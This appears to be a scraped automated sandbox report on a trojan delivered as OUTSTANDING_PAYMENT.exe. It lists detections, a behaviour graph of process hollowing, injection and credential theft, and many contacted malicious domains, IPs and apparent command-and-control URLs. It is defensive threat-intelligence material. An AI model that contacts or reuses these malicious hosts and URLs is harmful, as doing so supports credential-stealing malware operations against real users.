          External Remote ServicesScheduled TaskStartup ItemsStartup Items512
          Process Injection          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Rundll32          		Proc Filesystem1
          Remote System Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 830322 Sample: OUTSTANDING_PAYMENT.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 33 Snort IDS alert for network traffic 2->33 35 Multi AV Scanner detection for domain / URL 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 6 other signatures 2->39 9 OUTSTANDING_PAYMENT.exe 19 2->9         started        process3 file4 25 C:\Users\user\AppData\Local\Temp\qhcqh.exe, PE32 9->25 dropped 12 qhcqh.exe 9->12         started        process5 signatures6 51 Multi AV Scanner detection for dropped file 12->51 53 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 12->53 55 Maps a DLL or memory area into another process 12->55 15 qhcqh.exe 12->15         started        process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 15->57 59 Maps a DLL or memory area into another process 15->59 61 Sample uses process hollowing technique 15->61 63 Queues an APC in another process (thread injection) 15->63 18 explorer.exe 3 6 15->18 injected process9 dnsIp10 27 www.mynichemarket.co.uk 185.151.30.181, 49709, 49710, 49711 TWENTYIGB United Kingdom 18->27 29 www.landlotto.ru 109.70.26.37, 49712, 49713, 49714 RU-CENTERRU Russian Federation 18->29 31 18 other IPs or domains 18->31 41 System process connects to network (likely due to code injection or exploit) 18->41 22 rundll32.exe 13 18->22         started        signatures11 process12 signatures13 43 Tries to steal Mail credentials (via file / registry access) 22->43 45 Tries to harvest and steal browser information (history, passwords, etc) 22->45 47 Modifies the context of a thread in another process (thread injection) 22->47 49 Maps a DLL or memory area into another process 22->49

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          OUTSTANDING_PAYMENT.exe72%ReversingLabsWin32.Trojan.Leonem
          OUTSTANDING_PAYMENT.exe72%VirustotalBrowse
          OUTSTANDING_PAYMENT.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\qhcqh.exe51%ReversingLabsWin32.Trojan.Tnega

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          13.2.rundll32.exe.4f53814.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.2.qhcqh.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.qhcqh.exe.980000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          13.2.rundll32.exe.30544f8.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.OUTSTANDING_PAYMENT.exe.28ebe10.1.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          dirdikyepedia.com9%VirustotalBrowse
          allison2patrick.online6%VirustotalBrowse
          www.gorwly.top3%VirustotalBrowse
          glb-mobility.com3%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.karlscurry.co.uk/0oqq/?ICHyvj5=/wt4JY4W3l+DpUlEm50j75nj98dXbWC1Jam/Xyx5jEHfTH+E1ePLpr1g8eshFzfVb4/25r9KS6bvXq1NrjcG6ioEuox+na//qA==&qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.hudsonandbailey.uk0%Avira URL Cloudsafe
          http://www.fanversewallet.com/0oqq/qt9TW=60_ljPJoqo6d2100%Avira URL Cloudmalware
          http://www.g2fm.co.uk/0oqq/?ICHyvj5=mrlIldvmtur7mkt/rPLDu6zCaW7pq/FSfCj+/pKGfo5WkxwIgZbXON4VpSp8r5ryJHF0PKr2dhp3lAxH7D3LGu58YX7EcXy0Ow==&qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.karlscurry.co.uk/0oqq/0%Avira URL Cloudsafe
          http://www.dirdikyepedia.com/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=PRQC41TmcI9bvUwILfW251fDqJjDWsulERfzYnlMN4HgHjqryKViH0BFVe/NE6lVKE81tYv052d7aHxIDF6KpDCDELCE9pYayA==100%Avira URL Cloudmalware
          http://www.ty23vip.com/0oqq/qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.fanversewallet.com/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=Yikzj9CFq5vqEc2vNlbzxihd8s3DrMcGxuzxagcCy5X6CzTVIy/a14lT5vlHy5RQ1Z7Px0aDVF6+DD/SwGM+3qMYWad3MBh6/g==100%Avira URL Cloudmalware
          http://www.thelastwill.net/0oqq/0%Avira URL Cloudsafe
          http://www.mynichemarket.co.uk/0oqq/0%Avira URL Cloudsafe
          http://www.glb-mobility.com0%Avira URL Cloudsafe
          http://www.thelastwill.net/0oqq/qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.gorwly.top/0oqq/qt9TW=60_ljPJoqo6d2100%Avira URL Cloudmalware
          http://www.brennmansoluciones.com0%Avira URL Cloudsafe
          http://www.glb-mobility.com/0oqq/?ICHyvj5=L0mSdT0ooJoC+WTAff+ZGzvWM+chwjv3Dy0WIeNakQkmi/ixITEkKFHCL0Q8UzGKK5QpSY+AVQ3IyxgaFTuxUTcmK0rro2dEnw==&qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.allison2patrick.online/0oqq/100%Avira URL Cloudmalware
          http://www.karlscurry.co.uk0%Avira URL Cloudsafe
          http://www.glb-mobility.com/0oqq/0%Avira URL Cloudsafe
          http://www.g2fm.co.uk/0oqq/0%Avira URL Cloudsafe
          http://www.thelastwill.net0%Avira URL Cloudsafe
          http://www.sexopornoxx.store/0oqq/100%Avira URL Cloudmalware
          http://www.thebang.sbs0%Avira URL Cloudsafe
          http://www.ty23vip.com/0oqq/0%Avira URL Cloudsafe
          http://www.fanversewallet.com/0oqq/100%Avira URL Cloudmalware
          http://www.ketoibabal.cyou/0oqq/0%Avira URL Cloudsafe
          http://www.ty23vip.com0%Avira URL Cloudsafe
          http://www.landlotto.ru/0oqq/100%Avira URL Cloudmalware
          https://tiao2022.vip:12306/?u=0%Avira URL Cloudsafe
          http://www.gorwly.top100%Avira URL Cloudmalware
          http://www.mynichemarket.co.uk0%Avira URL Cloudsafe
          http://www.dirdikyepedia.com/0oqq/100%Avira URL Cloudmalware
          http://www.themssterofssuepnse.rest100%Avira URL Cloudmalware
          http://www.karlscurry.co.uk/0oqq/qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.fanversewallet.com100%Avira URL Cloudmalware
          http://www.allison2patrick.online0%Avira URL Cloudsafe
          http://www.brennmansoluciones.com/0oqq/qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.leewanyam.com/0oqq/poIb=tYchV80%Avira URL Cloudsafe
          http://www.brennmansoluciones.com/0oqq/0%Avira URL Cloudsafe
          http://www.gorwly.top/0oqq/100%Avira URL Cloudmalware
          http://www.glb-mobility.com/0oqq/qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.brennmansoluciones.com/0oqq/poIb=tYchV80%Avira URL Cloudsafe
          http://www.mynichemarket.co.uk/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=bPiAqCboB3xuuR9jBd2d5kx4kdlhaJ3zm41TCptSu6I9zHYblFc2aOuFx07ZodW9tNkBHFGkWniHGpAg445zXTdag0fAcLuZfA==0%Avira URL Cloudsafe
          http://www.leewanyam.com/0oqq/0%Avira URL Cloudsafe
          https://www.fasthosts.co.uk/domain-names/search/?domain=$0%Avira URL Cloudsafe
          https://fasthosts.co.uk/0%Avira URL Cloudsafe
          http://www.themssterofssuepnse.rest/0oqq/100%Avira URL Cloudmalware
          http://www.landlotto.ru/0oqq/qt9TW=60_ljPJoqo6d2100%Avira URL Cloudmalware
          http://www.mynichemarket.co.uk/0oqq/qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.ketoibabal.cyou0%Avira URL Cloudsafe
          https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_0%Avira URL Cloudsafe
          http://www.virginhairweave.co.uk/0oqq/0%Avira URL Cloudsafe
          http://www.themssterofssuepnse.rest/0oqq/poIb=tYchV8100%Avira URL Cloudmalware
          http://www.ketoibabal.cyou/0oqq/qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.landlotto.ru/0oqq/?ICHyvj5=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7+lksDMuqQ2YrnfA==&qt9TW=60_ljPJoqo6d2100%Avira URL Cloudmalware
          http://www.hudsonandbailey.uk/0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2100%Avira URL Cloudmalware
          http://www.virginhairweave.co.uk0%Avira URL Cloudsafe
          http://www.virginhairweave.co.uk/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=uTgIqe0UraKbEL8bVan9urdYcpPucjhGk2sL3YY9ls8dblQwqoiZoebTO/nXMXVf1qLfWs/b3Kzx4hfR3b8+tPCCgrVHYEBTbA==0%Avira URL Cloudsafe
          http://www.allison2patrick.online/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=+kFy7HAJLaaTMVi2uF0rU22efsuYGHBQaVugoRnSwIkO/2Cyn5VxSDOnkUbRzJjMahwif1zr/P1d/M6VqUD0f3xgTygnYxnqIA==100%Avira URL Cloudmalware
          http://www.themssterofssuepnse.rest/0oqq/qt9TW=60_ljPJoqo6d2100%Avira URL Cloudmalware
          http://www.g2fm.co.uk0%Avira URL Cloudsafe
          http://www.landlotto.ru100%Avira URL Cloudmalware
          http://www.hudsonandbailey.uk/0oqq/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          dirdikyepedia.com
          		5.181.216.141
          		truetrueunknown
          allison2patrick.online
          		62.4.21.190
          		truetrueunknown
          www.gorwly.top
          		192.64.116.162
          		truetrueunknown
          glb-mobility.com
          		88.99.217.197
          		truetrueunknown
          www.hudsonandbailey.uk
          		199.59.243.223
          		truetrue
            		unknown
            www.virginhairweave.co.uk
            		198.58.118.167
            		truetrue
              		unknown
              www.g2fm.co.uk
              		213.171.195.105
              		truetrue
                		unknown
                www.landlotto.ru
                		109.70.26.37
                		truetrue
                  		unknown
                  www.karlscurry.co.uk
                  		217.160.0.249
                  		truetrue
                    		unknown
                    www.ty23vip.com
                    		162.209.159.142
                    		truetrue
                      		unknown
                      fanversewallet.com
                      		203.245.24.47
                      		truetrue
                        		unknown
                        www.mynichemarket.co.uk
                        		185.151.30.181
                        		truetrue
                          		unknown
                          www.themssterofssuepnse.rest
                          		unknown
                          		unknowntrue
                            		unknown
                            www.glb-mobility.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.fanversewallet.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.ketoibabal.cyou
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.allison2patrick.online
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.brennmansoluciones.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.dirdikyepedia.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.thelastwill.net
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.g2fm.co.uk/0oqq/?ICHyvj5=mrlIldvmtur7mkt/rPLDu6zCaW7pq/FSfCj+/pKGfo5WkxwIgZbXON4VpSp8r5ryJHF0PKr2dhp3lAxH7D3LGu58YX7EcXy0Ow==&qt9TW=60_ljPJoqo6d2true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fanversewallet.com/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=Yikzj9CFq5vqEc2vNlbzxihd8s3DrMcGxuzxagcCy5X6CzTVIy/a14lT5vlHy5RQ1Z7Px0aDVF6+DD/SwGM+3qMYWad3MBh6/g==true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.karlscurry.co.uk/0oqq/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.karlscurry.co.uk/0oqq/?ICHyvj5=/wt4JY4W3l+DpUlEm50j75nj98dXbWC1Jam/Xyx5jEHfTH+E1ePLpr1g8eshFzfVb4/25r9KS6bvXq1NrjcG6ioEuox+na//qA==&qt9TW=60_ljPJoqo6d2true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.dirdikyepedia.com/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=PRQC41TmcI9bvUwILfW251fDqJjDWsulERfzYnlMN4HgHjqryKViH0BFVe/NE6lVKE81tYv052d7aHxIDF6KpDCDELCE9pYayA==true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.mynichemarket.co.uk/0oqq/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.glb-mobility.com/0oqq/?ICHyvj5=L0mSdT0ooJoC+WTAff+ZGzvWM+chwjv3Dy0WIeNakQkmi/ixITEkKFHCL0Q8UzGKK5QpSY+AVQ3IyxgaFTuxUTcmK0rro2dEnw==&qt9TW=60_ljPJoqo6d2true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.allison2patrick.online/0oqq/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.glb-mobility.com/0oqq/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.g2fm.co.uk/0oqq/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fanversewallet.com/0oqq/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.landlotto.ru/0oqq/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.dirdikyepedia.com/0oqq/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.gorwly.top/0oqq/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.mynichemarket.co.uk/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=bPiAqCboB3xuuR9jBd2d5kx4kdlhaJ3zm41TCptSu6I9zHYblFc2aOuFx07ZodW9tNkBHFGkWniHGpAg445zXTdag0fAcLuZfA==true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.virginhairweave.co.uk/0oqq/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.landlotto.ru/0oqq/?ICHyvj5=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7+lksDMuqQ2YrnfA==&qt9TW=60_ljPJoqo6d2true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.hudsonandbailey.uk/0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.virginhairweave.co.uk/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=uTgIqe0UraKbEL8bVan9urdYcpPucjhGk2sL3YY9ls8dblQwqoiZoebTO/nXMXVf1qLfWs/b3Kzx4hfR3b8+tPCCgrVHYEBTbA==true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.allison2patrick.online/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=+kFy7HAJLaaTMVi2uF0rU22efsuYGHBQaVugoRnSwIkO/2Cyn5VxSDOnkUbRzJjMahwif1zr/P1d/M6VqUD0f3xgTygnYxnqIA==true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.hudsonandbailey.uk/0oqq/true
                                          • Avira URL Cloud: malware
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabrundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drfalse
                                            		high
                                            https://www.nic.ru/catalog/mail/on-domain/?ipartner=6666&adv_id=click_mail&utm_source=stpg_all&utm_mrundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/ac/?q=81EFaKSJ3.13.drfalse
                                                		high
                                                http://www.ty23vip.com/0oqq/explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fanversewallet.com/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.ketoibabal.cyou/0oqq/explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.nic.ru/catalog/ssl/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://www.nic.ru/catalog/sites/sitebuilder/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://www.nic.ru/catalog/domains/ru/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      		high
                                                      http://nic.ru/images/w8/win8transp.pngrundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        		high
                                                        http://www.hudsonandbailey.ukexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.ty23vip.com/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.glb-mobility.comexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.google.comrundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.00000000054A8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          		high
                                                          http://nic.ru/rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://www.nic.ru/catalog/domains/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              		high
                                                              http://www.thelastwill.net/0oqq/explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.nic.ru/whois/?searchWord=LANDLOTTO.RU&ipartner=6666&adv_id=whois_info&utm_source=stpg_alrundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                		high
                                                                http://www.thelastwill.net/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.gorwly.top/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssrundll32.exe, 0000000D.00000002.781120791.0000000005FA6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.brennmansoluciones.comexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.nic.ru/catalog/mail/on-domain/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.karlscurry.co.ukexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.nic.ru/product/mail/forward/?ipartner=6666&adv_id=click_mail_forward&utm_source=stpg_allrundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.nic.ru/help/statusnaya-stranica_4785.html?ipartner=6666&adv_id=faq&utm_source=stpg_all&urundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.thelastwill.netexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.nic.ru/catalog/domains/rf/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.thebang.sbsexplorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.nic.ru/auction/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.sexopornoxx.store/0oqq/explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            http://www.ty23vip.comexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=81EFaKSJ3.13.drfalse
                                                                              		high
                                                                              https://www.nic.ru/catalog/hosting/dedicated/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.nic.ru/catalog/sites/sitebuilder/?ipartner=6666&adv_id=click_sitebuild&utm_source=stpg_arundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://nsis.sf.net/NSIS_ErrorErrorOUTSTANDING_PAYMENT.exefalse
                                                                                    		high
                                                                                    https://www.nic.ru/catalog/domains/com/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://tiao2022.vip:12306/?u=rundll32.exe, 0000000D.00000002.781120791.000000000645C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://www.nic.ru/product/for-domain-use/web-forwarding/?ipartner=6666&adv_id=click_domain_forward&rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=rundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drfalse
                                                                                          		high
                                                                                          http://www.gorwly.topexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          http://www.mynichemarket.co.ukexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.themssterofssuepnse.restexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          http://www.fanversewallet.comexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://www.nic.ru/opensearch.xmlrundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://storage.nic.ru/ru/images/png/1.rc-logo-og.pngrundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.brennmansoluciones.com/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.karlscurry.co.uk/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.leewanyam.com/0oqq/poIb=tYchV8explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
